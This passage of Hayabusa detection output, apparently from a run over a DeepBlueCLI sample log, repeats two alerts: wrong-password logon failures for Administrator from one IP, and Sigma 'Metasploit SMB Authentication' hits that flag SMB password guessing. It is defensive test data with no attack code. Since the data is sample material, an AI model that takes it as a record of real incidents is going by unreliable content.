17342016-09-20 01:50:20.657 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: QYlZwLsvrsuqUZ4q : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
17352016-09-20 01:50:20.657 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
17362016-09-20 01:50:20.707 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: pvGrzr30eVl5TGhA : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
17372016-09-20 01:50:20.707 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
17382016-09-20 01:50:20.791 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: tqdJcHWbdGcIIHBr : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
17392016-09-20 01:50:20.791 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
17402016-09-20 01:50:20.840 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: YDt69bIJ1yI6PXLg : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
17412016-09-20 01:50:20.840 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
17422016-09-20 01:50:20.879 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: WtE2uMuOe8QPAKOj : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
17432016-09-20 01:50:20.879 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
17442016-09-20 01:50:20.911 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: BWQDlZDgFj9NmMhJ : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
17452016-09-20 01:50:20.911 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
17462016-09-20 01:50:20.964 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: ncQiyLyHCXr8knGa : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
17472016-09-20 01:50:20.964 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
17482016-09-20 01:50:21.021 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: XjVmLfmcPMYbmdin : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
17492016-09-20 01:50:21.021 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
17502016-09-20 01:50:21.072 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: gU2HjzjDxHsnvENI : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
17512016-09-20 01:50:21.072 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
17522016-09-20 01:50:21.103 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: cUPn5CEz2LtwRwvZ : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
17532016-09-20 01:50:21.103 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
17542016-09-20 01:50:21.140 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: hCz069oBFXqpshbU : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
17552016-09-20 01:50:21.140 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
17562016-09-20 01:50:21.187 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: dzhc9PVRVP69tshD : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
17572016-09-20 01:50:21.187 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
17582016-09-20 01:50:21.226 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: ejA3ZNfKWEs8zAMX : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
17592016-09-20 01:50:21.226 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
17602016-09-20 01:50:21.265 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: U5egiL2PGOrYCHv5 : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
17612016-09-20 01:50:21.265 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
17622016-09-20 01:50:21.302 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: YYhIM3zla6KcbKbM : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
17632016-09-20 01:50:21.302 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
17642016-09-20 01:50:21.344 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: WjyQJnVBO4iC9Tkw : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
17652016-09-20 01:50:21.344 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
17662016-09-20 01:50:21.387 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: g6Tpp8TRa2nRxHzo : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
17672016-09-20 01:50:21.387 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
17682016-09-20 01:50:21.422 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: DyLvo5Bn2HzyANdH : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
17692016-09-20 01:50:21.422 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
17702016-09-20 01:50:21.465 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: NaXNThuZDGqJ7oCP : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
17712016-09-20 01:50:21.465 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
17722016-09-20 01:50:21.505 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: 42Sb7p19cQsEV30b : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
17732016-09-20 01:50:21.505 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
17742016-09-20 01:50:21.540 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: An6629wgflzSgqY5 : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
17752016-09-20 01:50:21.540 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
17762016-09-20 01:50:21.584 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: iO7JktEihqddmEtv : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
17772016-09-20 01:50:21.584 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
17782016-09-20 01:50:21.624 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: nG97BFOgKxnZaqi4 : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
17792016-09-20 01:50:21.624 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
17802016-09-20 01:50:21.668 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: SH2D24c6nRGDL4Oe : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
17812016-09-20 01:50:21.668 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
17822016-09-20 01:50:21.712 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: uiu2yfaM2JQQZoLF : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
17832016-09-20 01:50:21.712 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
17842016-09-20 01:50:21.745 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: YQx9PG8DtR2tMjvS : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
17852016-09-20 01:50:21.745 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
17862016-09-20 01:50:21.792 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: OoAWryajKhLD7RyY : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
17872016-09-20 01:50:21.792 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
17882016-09-20 01:50:21.836 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: PgewSeaVugP1TXss : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
17892016-09-20 01:50:21.836 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
17902016-09-20 01:50:21.911 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: sPMCPdCAnz4upz8X : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
17912016-09-20 01:50:21.911 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
17922016-09-20 01:50:21.956 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: dUbV6xnGeBWE8Dif : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
17932016-09-20 01:50:21.956 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
17942016-09-20 01:50:22.001 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: dIJ9mZczFO1GKItV : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
17952016-09-20 01:50:22.001 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
17962016-09-20 01:50:22.044 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: wW0vxE4o68L70Sra : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
17972016-09-20 01:50:22.044 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
17982016-09-20 01:50:22.085 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: upOn9DzB1yWtntyX : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
17992016-09-20 01:50:22.085 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
18002016-09-20 01:50:22.116 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: m9uGgocAVReiJWDm : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
18012016-09-20 01:50:22.116 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
18022016-09-20 01:50:22.153 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: qm9Jf1fles2HOb3g : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
18032016-09-20 01:50:22.153 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
18042016-09-20 01:50:22.193 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: Ev5eTWdf3CskOMuh : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
18052016-09-20 01:50:22.193 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
18062016-09-20 01:50:22.223 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: QoiMO6sSLOm4fOD5 : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
18072016-09-20 01:50:22.223 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
18082016-09-20 01:50:22.256 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: xDjvMsa2IgR9KO7l : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
18092016-09-20 01:50:22.256 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
18102016-09-20 01:50:22.293 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: SR7gVjxHZDYeK7pJ : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
18112016-09-20 01:50:22.293 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
18122016-09-20 01:50:22.323 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: 4jzGAepr7JeNKuuk : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
18132016-09-20 01:50:22.323 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
18142016-09-20 01:50:22.368 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: H9baxEeRCWjx6Fzr : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
18152016-09-20 01:50:22.368 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
18162016-09-20 01:50:22.405 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: Uy7aTt0B4ErguacA : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
18172016-09-20 01:50:22.405 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
18182016-09-20 01:50:22.431 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: nvKcLrUXqu2vTKO3 : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
18192016-09-20 01:50:22.431 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
18202016-09-20 01:50:22.486 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: PLycXLeAU21pdnXL : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
18212016-09-20 01:50:22.486 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
18222016-09-20 01:50:22.527 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: SgwjJSKOPnurDWW4 : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
18232016-09-20 01:50:22.527 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
18242016-09-20 01:50:22.564 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: YPDYdxPoQAl8aGMs : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
18252016-09-20 01:50:22.564 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
18262016-09-20 01:50:22.594 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: CX8knunlT6SMpmQw : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
18272016-09-20 01:50:22.594 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
18282016-09-20 01:50:22.632 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: AAjYbt50leZt3Xve : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
18292016-09-20 01:50:22.632 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
